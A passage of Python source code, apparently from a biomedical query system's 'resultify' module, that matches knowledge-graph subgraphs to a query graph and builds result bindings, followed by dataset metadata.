__init__(self):\n self.response = None\n self.message = None\n self.parameters = None\n\n def describe_me(self):\n \"\"\"\n Little helper function for internal use that describes the actions and what they can do\n :return:\n \"\"\"\n\n brief_description = \"\"\" Creates a list of results from the input query graph (QG) based on the the\ninformation contained in the message knowledge graph (KG). Every subgraph\nthrough the KG that satisfies the GQ is returned. Such use cases include:\n- `resultify()` Returns all subgraphs in the knowledge graph that satisfy the\n query graph\n- `resultiy(ignore_edge_direction=false)` This mode checks edge directions in\nthe QG to ensure that matching an edge in the KG to an edge in the QG is only\nallowed if the two edges point in the same direction. The default is to not\ncheck edge direction. For example, you may want to include results that include\nrelationships like `(protein)-[involved_in]->(pathway)` even though the\nunderlying KG only contains directional edges of the form\n`(protein)<-[involved_in]-(pathway)`. Note that this command will successfully\nexecute given an arbitrary query graph and knowledge graph provided by the\nautomated reasoning system, not just ones generated by Team ARA Expander.\"\"\"\n description_list = []\n params_dict = dict()\n params_dict['brief_description'] = brief_description\n params_dict['ignore_edge_direction'] = {'''`true` or `false`. 
Optional; default is `true`.'''}\n # TODO: will need to update manually if more self.parameters are added\n # eg. params_dict[node_id] = {\"a query graph node ID or list of such id's (required)\"} as per issue #640\n description_list.append(params_dict)\n return description_list\n\n def apply(self, input_message: Message, input_parameters: dict) -> Response:\n\n # Define a default response\n response = Response()\n self.response = response\n self.message = input_message\n\n # Basic checks on arguments\n if not isinstance(input_parameters, dict):\n response.error(\"Provided parameters is not a dict\", error_code=\"ParametersNotDict\")\n return response\n\n # Return if any of the parameters generated an error (showing not just the first one)\n if response.status != 'OK':\n return response\n\n # Store these final parameters for convenience\n response.data['parameters'] = input_parameters\n self.parameters = input_parameters\n\n response.debug(f\"Applying Resultifier to Message with parameters {input_parameters}\")\n\n # call _resultify\n self._resultify(describe=False)\n\n # Clean up the KG (should only contain nodes used in the results)\n self._clean_up_kg()\n\n # Return the response and done\n return response\n\n def _resultify(self, describe: bool = False):\n \"\"\"From a knowledge graph and a query graph (both in a Message object), extract a list of Results objects, each containing\n lists of NodeBinding and EdgeBinding objects. Add a list of Results objects to self.message.results.\n\n It is required that `self.parameters` contain the following:\n ignore_edge_direction: a parameter of type `bool` indicating whether\n the direction of an edge in the knowledge graph should be taken into\n account when matching that edge to an edge in the query graph. By\n default, this parameter is `true`. Set this parameter to false in\n order to require that an edge in a subgraph of the KG will only\n match an edge in the QG if both have the same direction (taking into\n account the source/target node mapping). 
Optional.\n\n \"\"\"\n assert self.response is not None\n results = self.message.results\n if results is not None and len(results) > 0:\n self.response.info(f\"Clearing previous results and computing a new set of results\")\n self.message.results = []\n results = self.message.results\n self.message.n_results = 0\n\n message = self.message\n parameters = self.parameters\n\n debug_mode = parameters.get('debug', None)\n if debug_mode is not None:\n try:\n debug_mode = _parse_boolean_case_insensitive(debug_mode)\n except Exception as e:\n self.response.error(str(e))\n return\n\n for parameter_name in parameters.keys():\n if parameter_name == '':\n continue\n if parameter_name not in ARAXResultify.ALLOWED_PARAMETERS:\n error_string = \"parameter type is not allowed in ARAXResultify: \" + str(parameter_name)\n if not debug_mode:\n self.response.error(error_string)\n return\n else:\n raise ValueError(error_string)\n\n kg = message.knowledge_graph\n qg = message.query_graph\n ignore_edge_direction = parameters.get('ignore_edge_direction', None)\n if ignore_edge_direction is not None:\n try:\n ignore_edge_direction = _parse_boolean_case_insensitive(ignore_edge_direction)\n except ValueError as e:\n error_string = \"parameter value is not allowed in ARAXResultify: \" + str(ignore_edge_direction)\n if not debug_mode:\n self.response.error(error_string)\n return\n else:\n raise e\n\n try:\n results = _get_results_for_kg_by_qg(kg,\n qg,\n ignore_edge_direction)\n message_code = 'OK'\n code_description = 'Result list computed from KG and QG'\n except Exception as e:\n if not debug_mode:\n code_description = str(e)\n message_code = e.__class__.__name__\n self.response.error(code_description)\n results = []\n else:\n raise e\n\n message.results = results\n if len(results) == 0 and message_code == 'OK':\n message_code = 'WARNING'\n code_description = 'no results returned'\n if len(kg.nodes) == 0:\n code_description += '; empty knowledge graph'\n self.response.warning(code_description)\n elif message_code == 'OK':\n self.response.info(f\"Resultify created {len(results)} results\")\n\n message.n_results = len(results)\n message.code_description = code_description\n message.message_code = message_code\n\n def _clean_up_kg(self):\n self.response.debug(f\"Cleaning up the KG to remove nodes not used in the results\")\n results = self.message.results\n kg = self.message.knowledge_graph\n node_ids_used_in_results = {node_binding.kg_id for result in results for node_binding in result.node_bindings}\n cleaned_kg = KnowledgeGraph(nodes=[node for node in kg.nodes if node.id in node_ids_used_in_results],\n edges=[edge for edge in kg.edges if {edge.source_id, edge.target_id}.issubset(node_ids_used_in_results)])\n self.message.knowledge_graph = cleaned_kg\n self.response.info(f\"After cleaning, the KG contains {len(self.message.knowledge_graph.nodes)} nodes and \"\n f\"{len(self.message.knowledge_graph.edges)} edges\")\n\n\ndef _make_edge_key(node1_id: str,\n node2_id: str) -> str:\n return node1_id + '->' + node2_id\n\n\ndef _is_specific_query_node(qnode: QNode):\n return (qnode.id is not None and ':' in qnode.id) or \\\n (qnode.curie is not None and ':' in qnode.curie)\n\n\ndef _make_adj_maps(graph: Union[QueryGraph, KnowledgeGraph],\n directed=True,\n droploops=True) -> Dict[str, Dict[str, Set[str]]]:\n if directed:\n adj_map_in: Dict[str, Set[str]] = {node.id: set() for node in graph.nodes}\n adj_map_out: Dict[str, Set[str]] = {node.id: set() for node in graph.nodes}\n else:\n adj_map: Dict[str, Set[str]] = {node.id: 
set() for node in graph.nodes}\n try:\n for edge in graph.edges:\n if droploops and edge.target_id == edge.source_id:\n continue\n if directed:\n edge_node_id = edge.source_id\n adj_map_out[edge_node_id].add(edge.target_id)\n edge_node_id = edge.target_id\n adj_map_in[edge_node_id].add(edge.source_id)\n else:\n edge_node_id = edge.source_id\n adj_map[edge_node_id].add(edge.target_id)\n edge_node_id = edge.target_id\n adj_map[edge_node_id].add(edge.source_id)\n except KeyError:\n raise ValueError(\"Graph has an edge \" + str(edge) + \" that refers to a node ID (\" + edge_node_id + \") that is not in the graph\")\n if directed:\n ret_dict = {'in': adj_map_in, 'out': adj_map_out}\n else:\n ret_dict = {'both': adj_map}\n return ret_dict\n\n\ndef _bfs_dists(adj_map: Dict[str, Set[str]],\n start_node_id: str) -> Dict[str, Union[int, float]]:\n queue = collections.deque([start_node_id])\n distances = {node_id: math.inf for node_id in adj_map.keys()}\n distances[start_node_id] = 0\n while len(queue) > 0:\n node_id = queue.popleft()\n node_dist = distances[node_id]\n assert not math.isinf(node_dist)\n for neighb_node_id in cast(Iterable[str], adj_map[node_id]):\n if math.isinf(distances[neighb_node_id]):\n distances[neighb_node_id] = node_dist + 1\n queue.append(neighb_node_id)\n return distances\n\n\ndef _get_essence_node_for_qg(qg: QueryGraph) -> Optional[str]:\n adj_map = _make_adj_maps(qg, directed=False)['both']\n node_ids_list = list(adj_map.keys())\n all_nodes = set(node_ids_list)\n node_degrees = list(map(len, adj_map.values()))\n leaf_nodes = set(node_ids_list[i] for i, k in enumerate(node_degrees) if k == 1)\n is_set_nodes = set(node.id for node in cast(Iterable[QNode], qg.nodes) if node.is_set)\n specific_nodes = set(node.id for node in cast(Iterable[QNode], qg.nodes) if _is_specific_query_node(node))\n non_specific_nodes = all_nodes - specific_nodes\n non_specific_leaf_nodes = leaf_nodes & non_specific_nodes\n\n if len(is_set_nodes & specific_nodes) > 0:\n raise ValueError(\"the following query nodes have specific CURIE IDs but have is_set=true: \" + str(is_set_nodes & specific_nodes))\n candidate_essence_nodes = non_specific_leaf_nodes - is_set_nodes\n if len(candidate_essence_nodes) == 0:\n candidate_essence_nodes = non_specific_nodes - is_set_nodes\n if len(candidate_essence_nodes) == 0:\n return None\n elif len(candidate_essence_nodes) == 1:\n return next(iter(candidate_essence_nodes))\n else:\n specific_leaf_nodes = specific_nodes & leaf_nodes\n if len(specific_leaf_nodes) == 0:\n map_node_id_to_pos: Dict[str, Union[int, float]] = {node.id: i for i, node in enumerate(cast(Iterable[QNode], qg.nodes))}\n if len(specific_nodes) == 0:\n # return the node.id of the non-specific node with the rightmost position in the QG node list\n return sorted(candidate_essence_nodes,\n key=lambda node_id: map_node_id_to_pos[node_id],\n reverse=True)[0]\n else:\n if len(specific_nodes) == 1:\n specific_node_id = next(iter(specific_nodes))\n return sorted(candidate_essence_nodes,\n key=lambda node_id: abs(map_node_id_to_pos[node_id] -\n map_node_id_to_pos[specific_node_id]),\n reverse=True)[0]\n else:\n # there are at least two non-specific leaf nodes and at least two specific nodes\n return sorted(candidate_essence_nodes,\n key=lambda node_id: min([abs(map_node_id_to_pos[node_id] -\n map_node_id_to_pos[specific_node_id]) for\n specific_node_id in specific_nodes]),\n reverse=True)[0]\n else:\n if len(specific_leaf_nodes) == 1:\n specific_leaf_node_id = next(iter(specific_leaf_nodes))\n 
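# Editor's note (added comment, not part of the original source): _bfs_dists maps every node id to its hop\n # distance from the start node (math.inf if unreachable); e.g. for a linear QG n00--n01--n02,\n # _bfs_dists(adj_map, 'n00') returns {'n00': 0, 'n01': 1, 'n02': 2}.\n 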
map_node_id_to_pos = _bfs_dists(adj_map, specific_leaf_node_id)\n else:\n all_dist_maps_for_spec_leaf_nodes = {node_id: _bfs_dists(adj_map,\n node_id) for\n node_id in specific_leaf_nodes}\n map_node_id_to_pos = {node.id: min([dist_map[node.id] for dist_map in all_dist_maps_for_spec_leaf_nodes.values()]) for\n node in cast(Iterable[QNode], qg.nodes)}\n return sorted(candidate_essence_nodes,\n key=lambda node_id: map_node_id_to_pos[node_id],\n reverse=True)[0]\n assert False\n\n\ndef _parse_boolean_case_insensitive(input_string: str) -> bool:\n if input_string is None:\n raise ValueError(\"invalid value for input_string\")\n input_string = input_string.lower()\n if input_string == 'true':\n return True\n elif input_string == 'false':\n return False\n else:\n raise ValueError(\"invalid value for input_string\")\n\n\ndef _get_results_for_kg_by_qg(kg: KnowledgeGraph, # all nodes *must* have qnode_id specified\n qg: QueryGraph,\n ignore_edge_direction: bool = True) -> List[Result]:\n\n if ignore_edge_direction is None:\n return _get_results_for_kg_by_qg(kg, qg)\n\n if len([node.id for node in cast(Iterable[QNode], qg.nodes) if node.id is None]) > 0:\n raise ValueError(\"node has None for node.id in query graph\")\n\n if len([node.id for node in cast(Iterable[Node], kg.nodes) if node.id is None]) > 0:\n raise ValueError(\"node has None for node.id in knowledge graph\")\n\n kg_node_ids_without_qnode_id = [node.id for node in cast(Iterable[Node], kg.nodes) if not node.qnode_ids]\n if len(kg_node_ids_without_qnode_id) > 0:\n raise ValueError(\"these node IDs do not have qnode_ids set: \" + str(kg_node_ids_without_qnode_id))\n\n kg_edge_ids_without_qedge_id = [edge.id for edge in cast(Iterable[Edge], kg.edges) if not edge.qedge_ids]\n if len(kg_edge_ids_without_qedge_id) > 0:\n raise ValueError(\"these edges do not have qedge_ids set: \" + str(kg_edge_ids_without_qedge_id))\n\n kg_edge_ids_by_qg_id = _get_kg_edge_ids_by_qg_id(kg)\n kg_node_ids_by_qg_id = _get_kg_node_ids_by_qg_id(kg)\n\n # build up maps of node IDs to nodes, for both the KG and QG\n kg_nodes_map = {node.id: node for node in cast(Iterable[Node], kg.nodes)}\n qg_nodes_map = {node.id: node for node in cast(Iterable[QNode], qg.nodes)}\n\n # build up maps of edge IDs to edges, for both the KG and QG\n kg_edges_map = {edge.id: edge for edge in cast(Iterable[Edge], kg.edges)}\n qg_edges_map = {edge.id: edge for edge in cast(Iterable[QEdge], qg.edges)}\n\n # --------------------- checking for validity of the NodeBindings list --------------\n # we require that every query graph node ID in the \"values\" slot of the node_bindings_map corresponds to an actual node in the QG\n qnode_ids_mapped_that_are_not_in_qg = [qnode_id for qnode_id in kg_node_ids_by_qg_id if qnode_id not in qg_nodes_map]\n if len(qnode_ids_mapped_that_are_not_in_qg) > 0:\n raise ValueError(\"A node in the KG has a qnode_id that does not exist in the QueryGraph: \" + str(qnode_ids_mapped_that_are_not_in_qg))\n\n # --------------------- checking for validity of the EdgeBindings list --------------\n # we require that every query graph edge ID in the \"values\" slot of the edge_bindings_map corresponds to an actual edge in the QG\n qedge_ids_mapped_that_are_not_in_qg = [qedge_id for qedge_id in kg_edge_ids_by_qg_id if qedge_id not in qg_edges_map]\n if len(qedge_ids_mapped_that_are_not_in_qg) > 0:\n raise ValueError(\"An edge in the KG has a qedge_id that does not exist in the QueryGraph: \" + str(qedge_ids_mapped_that_are_not_in_qg))\n\n # --------------------- checking 
that the source ID and target ID of every edge in KG is a valid KG node ---------------------\n node_ids_for_edges_that_are_not_valid_nodes = [edge.source_id for edge in cast(Iterable[Edge], kg.edges) if not\n kg_nodes_map.get(edge.source_id)] + \\\n [edge.target_id for edge in cast(Iterable[Edge], kg.edges) if not\n kg_nodes_map.get(edge.target_id)]\n if len(node_ids_for_edges_that_are_not_valid_nodes) > 0:\n raise ValueError(\"KG has Edges that refer to the following non-existent Nodes: \" + str(node_ids_for_edges_that_are_not_valid_nodes))\n\n # --------------------- checking that the source ID and target ID of every edge in QG is a valid QG node ---------------------\n invalid_qnode_ids_used_by_qedges = [edge.source_id for edge in cast(Iterable[QEdge], qg.edges) if not\n qg_nodes_map.get(edge.source_id)] + \\\n [edge.target_id for edge in cast(Iterable[QEdge], qg.edges) if not\n qg_nodes_map.get(edge.target_id)]\n if len(invalid_qnode_ids_used_by_qedges) > 0:\n raise ValueError(\"QG has QEdges that refer to the following non-existent QNodes: \" + str(invalid_qnode_ids_used_by_qedges))\n\n # --------------------- checking for consistency of edge-to-node relationships, for all edge bindings -----------\n # check that for each bound KG edge, the QG mappings of the KG edges source and target nodes are also the\n # source and target nodes of the QG edge that corresponds to the bound KG edge\n for qedge_id, kg_edge_ids_for_this_qedge_id in kg_edge_ids_by_qg_id.items():\n qg_edge = next(qedge for qedge in qg.edges if qedge.id == qedge_id)\n qg_source_node_id = qg_edge.source_id\n qg_target_node_id = qg_edge.target_id\n for edge_id in kg_edge_ids_for_this_qedge_id:\n kg_edge = kg_edges_map.get(edge_id)\n kg_source_node_id = kg_edge.source_id\n kg_target_node_id = kg_edge.target_id\n if qg_source_node_id != qg_target_node_id:\n edge_valid_in_same_direction = (kg_source_node_id in kg_node_ids_by_qg_id[qg_source_node_id] and\n kg_target_node_id in kg_node_ids_by_qg_id[qg_target_node_id])\n edge_valid_in_opposite_direction = (kg_source_node_id in kg_node_ids_by_qg_id[qg_target_node_id] and\n kg_target_node_id in kg_node_ids_by_qg_id[qg_source_node_id])\n edge_is_valid = (edge_valid_in_same_direction or edge_valid_in_opposite_direction) if ignore_edge_direction else edge_valid_in_same_direction\n if not edge_is_valid:\n kg_source_node = kg_nodes_map.get(kg_source_node_id)\n kg_target_node = kg_nodes_map.get(kg_target_node_id)\n raise ValueError(f\"Edge {kg_edge.id} (fulfilling {qg_edge.id}) has node(s) that do not fulfill the \"\n f\"expected qnodes ({qg_source_node_id} and {qg_target_node_id}). 
Edge's nodes are \"\n f\"{kg_source_node_id} (qnode_ids: {kg_source_node.qnode_ids}) and \"\n f\"{kg_target_node_id} (qnode_ids: {kg_target_node.qnode_ids}).\")\n\n # ============= save until SAR can discuss with {EWD,DMK} whether there can be unmapped nodes in the KG =============\n # # if any node in the KG is not bound to a node in the QG, drop the KG node; redefine \"kg\" as the filtered KG\n # kg_node_ids_keep = {node.id for node in kg.nodes if node.id in node_bindings_map}\n # kg_nodes_keep_list = [node for node in kg.nodes if node.id in kg_node_ids_keep]\n # kg_edges_keep_list = [edge for edge in kg.edges if not (edge.source_id in kg_node_ids_keep and\n # edge.target_id in kg_node_ids_keep)]\n # kg = KnowledgeGraph(nodes=kg_nodes_keep_list,\n # edges=kg_edges_keep_list)\n # ============= save until SAR can discuss with {EWD,DMK} whether there can be unmapped nodes in the KG =============\n\n # Our goal is to enumerate all distinct \"edge-maximal\" subgraphs of the KG that each \"covers\"\n # the QG. A subgraph of KG that \"covers\" the QG is one for which all of the following conditions hold:\n # (1) under the KG-to-QG node bindings map, the range of the KG subgraph's nodes is the entire set of nodes in the QG\n # (2) for any QG node that has \"is_set=True\", *all* KG nodes that are bound to the same QG node are in the subgraph\n # (3) every edge in the QG is \"covered\" by at least one edge in the KG\n\n results: List[Result] = []\n\n # Return empty result list if the QG isn't fulfilled\n unfulfilled_qnode_ids = [qnode.id for qnode in qg.nodes if not kg_node_ids_by_qg_id.get(qnode.id)]\n unfulfilled_qedge_ids = [qedge.id for qedge in qg.edges if not kg_edge_ids_by_qg_id.get(qedge.id)]\n if unfulfilled_qnode_ids or unfulfilled_qedge_ids or not kg.nodes:\n return results\n\n results = _create_results(kg, qg, ignore_edge_direction)\n\n return results\n\n\ndef _get_connected_qnode(qnode_id: str, qnode_ids_to_choose_from: [str], query_graph: QueryGraph) -> Optional[str]:\n for qedge in query_graph.edges:\n if qedge.source_id == qnode_id and qedge.target_id in qnode_ids_to_choose_from:\n return qedge.target_id\n elif qedge.target_id == qnode_id and qedge.source_id in qnode_ids_to_choose_from:\n return qedge.source_id\n return None\n\n\ndef _get_query_node(qnode_id: str, query_graph: QueryGraph) -> QNode:\n for qnode in query_graph.nodes:\n if qnode.id == qnode_id:\n return qnode\n return None\n\n\ndef _get_query_edge(qedge_id: str, query_graph: QueryGraph) -> QEdge:\n for qedge in query_graph.edges:\n if qedge.id == qedge_id:\n return qedge\n return None\n\n\ndef _get_qnodes_in_order(query_graph: QueryGraph) -> List[QNode]:\n if len(query_graph.edges) == 0:\n return [query_graph.nodes[0]]\n elif len(query_graph.edges) == 1:\n qedge = query_graph.edges[0]\n return [_get_query_node(qedge.source_id, query_graph), _get_query_node(qedge.target_id, query_graph)]\n else:\n qnode_ids_remaining = [qnode.id for qnode in query_graph.nodes]\n ordered_qnode_ids = []\n while qnode_ids_remaining:\n if not ordered_qnode_ids:\n starting_qnode_id = qnode_ids_remaining.pop()\n ordered_qnode_ids = [starting_qnode_id]\n else:\n new_right_most_qnode_id = _get_connected_qnode(ordered_qnode_ids[-1], qnode_ids_remaining, query_graph)\n new_left_most_qnode_id = _get_connected_qnode(ordered_qnode_ids[0], qnode_ids_remaining, query_graph)\n if new_right_most_qnode_id:\n ordered_qnode_ids.append(new_right_most_qnode_id)\n qnode_ids_remaining.pop(qnode_ids_remaining.index(new_right_most_qnode_id))\n elif 
new_left_most_qnode_id:\n ordered_qnode_ids.insert(0, new_left_most_qnode_id)\n qnode_ids_remaining.pop(qnode_ids_remaining.index(new_left_most_qnode_id))\n else:\n disconnected_qnode_id = qnode_ids_remaining[0]\n ordered_qnode_ids.append(disconnected_qnode_id)\n qnode_ids_remaining.pop(qnode_ids_remaining.index(disconnected_qnode_id))\n return [_get_query_node(qnode_id, query_graph) for qnode_id in ordered_qnode_ids]\n\n\ndef _get_kg_node_ids_by_qg_id(knowledge_graph: KnowledgeGraph) -> Dict[str, Set[str]]:\n node_ids_by_qg_id = dict()\n for node in knowledge_graph.nodes:\n if node.qnode_ids:\n for qnode_id in node.qnode_ids:\n if qnode_id not in node_ids_by_qg_id:\n node_ids_by_qg_id[qnode_id] = set()\n node_ids_by_qg_id[qnode_id].add(node.id)\n return node_ids_by_qg_id\n\n\ndef _get_kg_edge_ids_by_qg_id(knowledge_graph: KnowledgeGraph) -> Dict[str, Set[str]]:\n edge_ids_by_qg_id = dict()\n for edge in knowledge_graph.edges:\n if edge.qedge_ids:\n for qedge_id in edge.qedge_ids:\n if qedge_id not in edge_ids_by_qg_id:\n edge_ids_by_qg_id[qedge_id] = set()\n edge_ids_by_qg_id[qedge_id].add(edge.id)\n return edge_ids_by_qg_id\n\n\ndef _get_connected_qnode_ids(qnode_id: str, query_graph: QueryGraph) -> Set[str]:\n qnode_ids_used_on_same_qedges = set()\n for qedge in query_graph.edges:\n qnode_ids_used_on_same_qedges.add(qedge.source_id)\n qnode_ids_used_on_same_qedges.add(qedge.target_id)\n return qnode_ids_used_on_same_qedges.difference({qnode_id})\n\n\ndef _create_new_empty_result_graph(query_graph: QueryGraph) -> Dict[str, Dict[str, Set[str]]]:\n empty_result_graph = {'nodes': {qnode.id: set() for qnode in query_graph.nodes},\n 'edges': {qedge.id: set() for qedge in query_graph.edges}}\n return empty_result_graph\n\n\ndef _copy_result_graph(result_graph: Dict[str, Dict[str, Set[str]]]) -> Dict[str, Dict[str, Set[str]]]:\n result_graph_copy = {'nodes': {qnode_id: node_ids for qnode_id, node_ids in result_graph['nodes'].items()},\n 'edges': {qedge_id: edge_ids for qedge_id, edge_ids in result_graph['edges'].items()}}\n return result_graph_copy\n\n\ndef _get_edge_node_pair_key(edge: Edge) -> str:\n return \"--\".join(sorted([edge.source_id, edge.target_id]))\n\n\ndef _get_parallel_qedge_ids(input_qedge: QEdge, query_graph: QueryGraph) -> Set[str]:\n input_qedge_node_ids = {input_qedge.source_id, input_qedge.target_id}\n parallel_qedge_ids = {qedge.id for qedge in query_graph.edges if {qedge.source_id, qedge.target_id} == input_qedge_node_ids}\n return parallel_qedge_ids\n\n\ndef _get_kg_node_adj_map_by_qg_id(kg_node_ids_by_qg_id: Dict[str, Set[str]], knowledge_graph: KnowledgeGraph, query_graph: QueryGraph) -> Dict[str, Dict[str, Dict[str, Set[str]]]]:\n # Returned dict looks like {'n00': {'CUI:11234': {'n01': {UniProtKB:122}}}}\n # First initiate the overall structure of our (QG-organized) adjacency map\n kg_node_to_node_map = {qnode_id: dict() for qnode_id in kg_node_ids_by_qg_id}\n for qnode_id, node_ids_set in kg_node_ids_by_qg_id.items():\n connected_qnode_ids = _get_connected_qnode_ids(qnode_id, query_graph)\n for node_id in node_ids_set:\n kg_node_to_node_map[qnode_id][node_id] = {connected_qnode_id: set() for connected_qnode_id in connected_qnode_ids}\n\n # Create a record of which qedge IDs are fulfilled between which node pairs\n node_pair_to_qedge_id_map = dict()\n for edge in knowledge_graph.edges:\n node_pair_key = _get_edge_node_pair_key(edge)\n if node_pair_key not in node_pair_to_qedge_id_map:\n node_pair_to_qedge_id_map[node_pair_key] = set()\n 
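# Editor's note (added comment, not part of the original source): with hypothetical ids this map ends up like\n # {'CUI:111--UniProtKB:222': {'e00', 'e01'}}, i.e. for each unordered KG node pair, the set of qedge ids\n # fulfilled between that pair; it is checked below so that a pair counts as connected only when ALL parallel\n # qedges between the two qnodes are fulfilled.\n 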
node_pair_to_qedge_id_map[node_pair_key] = node_pair_to_qedge_id_map[node_pair_key].union(set(edge.qedge_ids))\n\n # Fill out which KG nodes are connected to which\n for edge in knowledge_graph.edges:\n for qedge_id in edge.qedge_ids:\n qedge = _get_query_edge(qedge_id, query_graph)\n # Make sure ALL qedges between these two nodes have been fulfilled before marking them as 'connected'\n parallel_qedge_ids = _get_parallel_qedge_ids(qedge, query_graph)\n if parallel_qedge_ids.issubset(node_pair_to_qedge_id_map[_get_edge_node_pair_key(edge)]):\n qnode_id_1 = qedge.source_id\n qnode_id_2 = qedge.target_id\n if edge.source_id in kg_node_ids_by_qg_id[qnode_id_1] and edge.target_id in kg_node_ids_by_qg_id[qnode_id_2]:\n kg_node_to_node_map[qnode_id_1][edge.source_id][qnode_id_2].add(edge.target_id)\n kg_node_to_node_map[qnode_id_2][edge.target_id][qnode_id_1].add(edge.source_id)\n if edge.source_id in kg_node_ids_by_qg_id[qnode_id_2] and edge.target_id in kg_node_ids_by_qg_id[qnode_id_1]:\n kg_node_to_node_map[qnode_id_2][edge.source_id][qnode_id_1].add(edge.target_id)\n kg_node_to_node_map[qnode_id_1][edge.target_id][qnode_id_2].add(edge.source_id)\n return kg_node_to_node_map\n\n\ndef _result_graph_is_fulfilled(result_graph: Dict[str, Dict[str, Set[str]]], query_graph: QueryGraph) -> bool:\n for qnode in query_graph.nodes:\n if not result_graph['nodes'].get(qnode.id):\n return False\n for qedge in query_graph.edges:\n if not result_graph['edges'].get(qedge.id):\n return False\n return True\n\n\ndef _create_results(kg: KnowledgeGraph,\n qg: QueryGraph,\n ignore_edge_direction: bool = True) -> List[Result]:\n result_graphs = []\n kg_node_ids_by_qg_id = _get_kg_node_ids_by_qg_id(kg)\n kg_node_adj_map_by_qg_id = _get_kg_node_adj_map_by_qg_id(kg_node_ids_by_qg_id, kg, qg)\n kg_node_lookup = {node.id: node for node in kg.nodes}\n qnodes_in_order = _get_qnodes_in_order(qg)\n\n # First create result graphs with only the nodes filled out\n for qnode in qnodes_in_order:\n prior_qnode = qnodes_in_order[qnodes_in_order.index(qnode) - 1] if qnodes_in_order.index(qnode) > 0 else None\n if not result_graphs:\n all_node_ids_in_kg_for_this_qnode_id = kg_node_ids_by_qg_id.get(qnode.id)\n if qnode.is_set:\n new_result_graph = _create_new_empty_result_graph(qg)\n new_result_graph['nodes'][qnode.id] = all_node_ids_in_kg_for_this_qnode_id\n result_graphs.append(new_result_graph)\n else:\n for node_id in all_node_ids_in_kg_for_this_qnode_id:\n new_result_graph = _create_new_empty_result_graph(qg)\n new_result_graph['nodes'][qnode.id] = {node_id}\n result_graphs.append(new_result_graph)\n else:\n new_result_graphs = []\n for result_graph in result_graphs:\n node_ids_for_prior_qnode_id = result_graph['nodes'][prior_qnode.id]\n connected_node_ids = set()\n for node_id in node_ids_for_prior_qnode_id:\n connected_node_ids = connected_node_ids.union(kg_node_adj_map_by_qg_id[prior_qnode.id][node_id][qnode.id])\n if qnode.is_set:\n new_result_graph = _copy_result_graph(result_graph)\n new_result_graph['nodes'][qnode.id] = connected_node_ids\n new_result_graphs.append(new_result_graph)\n else:\n for node_id in connected_node_ids:\n new_result_graph = _copy_result_graph(result_graph)\n new_result_graph['nodes'][qnode.id] = {node_id}\n new_result_graphs.append(new_result_graph)\n result_graphs = new_result_graphs\n\n # Then add edges to our result graphs as appropriate\n edges_by_node_pairs = {qedge.id: dict() for qedge in qg.edges}\n for edge in kg.edges:\n if edge.qedge_ids:\n for qedge_id in edge.qedge_ids:\n edge_node_pair 
= f\"{edge.source_id}--{edge.target_id}\"\n if edge_node_pair not in edges_by_node_pairs[qedge_id]:\n edges_by_node_pairs[qedge_id][edge_node_pair] = set()\n edges_by_node_pairs[qedge_id][edge_node_pair].add(edge.id)\n if ignore_edge_direction:\n node_pair_in_other_direction = f\"{edge.target_id}--{edge.source_id}\"\n if node_pair_in_other_direction not in edges_by_node_pairs[qedge_id]:\n edges_by_node_pairs[qedge_id][node_pair_in_other_direction] = set()\n edges_by_node_pairs[qedge_id][node_pair_in_other_direction].add(edge.id)\n for result_graph in result_graphs:\n for qedge_id in result_graph['edges']:\n qedge = _get_query_edge(qedge_id, qg)\n potential_nodes_1 = result_graph['nodes'][qedge.source_id]\n potential_nodes_2 = result_graph['nodes'][qedge.target_id]\n possible_node_pairs = set()\n for node_1 in potential_nodes_1:\n for node_2 in potential_nodes_2:\n node_pair_key = f\"{node_1}--{node_2}\"\n possible_node_pairs.add(node_pair_key)\n for node_pair in possible_node_pairs:\n ids_of_matching_edges = edges_by_node_pairs[qedge_id].get(node_pair, set())\n result_graph['edges'][qedge_id] = result_graph['edges'][qedge_id].union(ids_of_matching_edges)\n\n final_result_graphs = [result_graph for result_graph in result_graphs if _result_graph_is_fulfilled(result_graph, qg)]\n\n # Convert these into actual object model results\n results = []\n for result_graph in final_result_graphs:\n node_bindings = []\n for qnode_id, node_ids in result_graph['nodes'].items():\n for node_id in node_ids:\n node_bindings.append(NodeBinding(qg_id=qnode_id, kg_id=node_id))\n edge_bindings = []\n for qedge_id, edge_ids in result_graph['edges'].items():\n for edge_id in edge_ids:\n edge_bindings.append(EdgeBinding(qg_id=qedge_id, kg_id=edge_id))\n result = Result(node_bindings=node_bindings, edge_bindings=edge_bindings)\n\n # Fill out the essence for the result\n essence_qnode_id = _get_essence_node_for_qg(qg)\n essence_qnode = _get_query_node(essence_qnode_id, qg)\n essence_kg_node_id_set = result_graph['nodes'].get(essence_qnode_id, set())\n if len(essence_kg_node_id_set) == 1:\n essence_kg_node_id = next(iter(essence_kg_node_id_set))\n essence_kg_node = kg_node_lookup[essence_kg_node_id]\n result.essence = essence_kg_node.name\n if result.essence is None:\n result.essence = essence_kg_node_id\n assert result.essence is not None\n if essence_kg_node.symbol is not None:\n result.essence += \" (\" + str(essence_kg_node.symbol) + \")\"\n result.essence_type = str(essence_qnode.type) if essence_qnode else None\n elif len(essence_kg_node_id_set) == 0:\n result.essence = cast(str, None)\n result.essence_type = cast(str, None)\n else:\n raise ValueError(f\"Result contains more than one node that is a candidate for the essence: {essence_kg_node_id_set}\")\n\n # Programmatically generating an informative description for each result\n # seems difficult, but having something non-None is required by the\n # database. 
Just put in a placeholder for now, as is done by the\n # QueryGraphReasoner\n result.description = \"No description available\" # see issue 642\n\n results.append(result)\n\n return results\n\n\n\n\n", "sub_path": "code/ARAX/ARAXQuery/ARAX_resultify.py", "file_name": "ARAX_resultify.py", "file_ext": "py", "file_size_in_byte": 38363, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sys.path.append", "line_number": 37, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.normpath", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 37, "usage_type": "call"}, {"api_name": "swagger_server.models.biolink_entity.BiolinkEntity", "line_number": 52, "usage_type": "name"}, {"api_name": "swagger_server.models.message.Message", "line_number": 104, "usage_type": "name"}, {"api_name": "response.Response", "line_number": 107, "usage_type": "call"}, {"api_name": "response.error", "line_number": 113, "usage_type": "call"}, {"api_name": "response.status", "line_number": 117, "usage_type": "attribute"}, {"api_name": "response.data", "line_number": 121, "usage_type": "attribute"}, {"api_name": "response.debug", "line_number": 124, "usage_type": "call"}, {"api_name": "response.Response", "line_number": 104, "usage_type": "name"}, {"api_name": 